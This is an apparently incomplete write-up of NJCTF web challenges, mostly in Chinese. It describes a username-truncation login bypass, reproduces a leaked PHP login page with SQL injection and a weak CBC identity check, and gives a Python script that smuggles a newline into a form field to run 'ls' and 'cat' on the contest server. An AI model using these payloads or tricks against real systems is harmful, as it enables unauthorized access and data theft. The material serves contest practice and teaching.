NJCTF Writeup

0

Web

Come On

Just do it. Maybe you know where to get the flag. http://218.2.197.235:23733/

Login

login? http://218.2.197.235:23731/

猜测后端在检查时是将帐号密码一起select来判断检查用户,漏洞为任意用户登录。注册一个类似admin xxx,数据库会把最后的x截断。用admin帐号登录,密码为之前注册的,即可登录admin帐号,拿到flag。

Be Logical

Don't be a bad guy, please. http://218.2.197.235:23739/

Be admin

are you admin? http://218.2.197.235:23737/

index.php.bak得到备份源码如下:

<?php
error_reporting(0);
define("SECRET_KEY", "......");
define("METHOD", "aes-128-cbc");
 
session_start();
 
function get_random_token(){
    $random_token='';
    for($i=0;$i<16;$i++){
        $random_token.=chr(rand(1,255));
    }
    return $random_token;
}
 
function get_identity()
{
    global $defaultId;
    $j = $defaultId;
    $token = get_random_token();
    $c = openssl_encrypt($j, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("ID", base64_encode($c));
    setcookie("token", base64_encode($token));
    if ($j === 'admin') {
        $_SESSION['isadmin'] = true;
    } else $_SESSION['isadmin'] = false;
 
}
 
function test_identity()
{
    if (!isset($_COOKIE["token"]))
        return array();
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        if ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE["token"]))) {
            if ($u === 'admin') {
                $_SESSION['isadmin'] = true;
            } else $_SESSION['isadmin'] = false;
        } else {
            die("ERROR!");
        }
    }
}
 
function login($encrypted_pass, $pass)
{
    $encrypted_pass = base64_decode($encrypted_pass);
    $iv = substr($encrypted_pass, 0, 16);
    $cipher = substr($encrypted_pass, 16);
    $password = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    return $password == $pass;
}
 
 
 
function need_login($message = NULL) {
    echo "   <!doctype html>
        <html>
        <head>
        <meta charset=\"UTF-8\">
        <title>Login</title>
        <link rel=\"stylesheet\" href=\"CSS/target.css\">
            <script src=\"https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js\"></script>
        </head>
        <body>";
    if (isset($message)) {
        echo "  <div>" . $message . "</div>\n";
    }
    echo "<form method=\"POST\" action=''>
            <div class=\"body\"></div>
                <div class=\"grad\"></div>
                    <div class=\"header\">
                        <div>Log<span>In</span></div>
                    </div>
                    <br>
                    <div class=\"login\">
                        <input type=\"text\" placeholder=\"username\" name=\"username\">
                        <input type=\"password\" placeholder=\"password\" name=\"password\">               
                        <input type=\"submit\" value=\"Login\">
                    </div>
                     <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
            </form>
        </body>
    </html>";
}
 
function show_homepage() {
    echo "<!doctype html>
<html>
<head><title>Login</title></head>
<body>";
    global $flag;
    printf("Hello ~~~ ctfer! ");
    if ($_SESSION["isadmin"])
        echo $flag;
    echo "<div><a href=\"logout.php\">Log out</a></div>
</body>
</html>";
 
}
 
if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    $query = "SELECT username, encrypted_pass from users WHERE username='$username'";
    $res = $conn->query($query) or trigger_error($conn->error . "[$query]");
    if ($row = $res->fetch_assoc()) {
        $uname = $row['username'];
        $encrypted_pass = $row["encrypted_pass"];
    }
 
    if ($row && login($encrypted_pass, $password)) {
        echo "you are in!" . "</br>";
        get_identity();
        show_homepage();
    } else {
        echo "<script>alert('login failed!');</script>";
        need_login("Login Failed!");
    }
 
} else {
    test_identity();
    if (isset($_SESSION["id"])) {
        show_homepage();
    } else {
        need_login();
    }
}

Wallet

钱包里面有flag http://218.2.197.235:23723/

Get Flag

别BB,来拿FLAG PS:delay 5s http://218.2.197.235:23725/

%0a换行和%20空格,结合rce列根目录得到flag文件名为/9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag,再cat一下得到flag。

#!/usr/bin/python
import urllib
import requests
import re
import base64
 
url = "http://218.2.197.235:23725/hehe"
#payload = 'test%0als%20/'
payload = 'test%0acat%20/9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag'
payload = urllib.unquote(payload)
data = {'flag':payload,'submit':''}
content = requests.post(url,data).content
result = re.findall(r"(Y2F.*)\"",content)[0]
 
print base64.b64decode(result)

pictures' wall

图片墙上有图片 http://218.2.197.235:23719/

Text wall

留言墙,2333333333333333333333333 http://218.2.197.235:23721/

Blog

前端养成之路,从写博客开始 http://218.2.197.235:23727 附件下载

Chall I

前端和小姨子跑了,没办法JS都得从头学起,干脆前后端都用js写吧 PS: 本题不用扫描 http://218.2.197.235:23729/

Chall II

你得得到第一个flag http://218.2.197.235:23729/

Leave A Reply

苏ICP备16066660号-1

苏公网安备 32011502010432号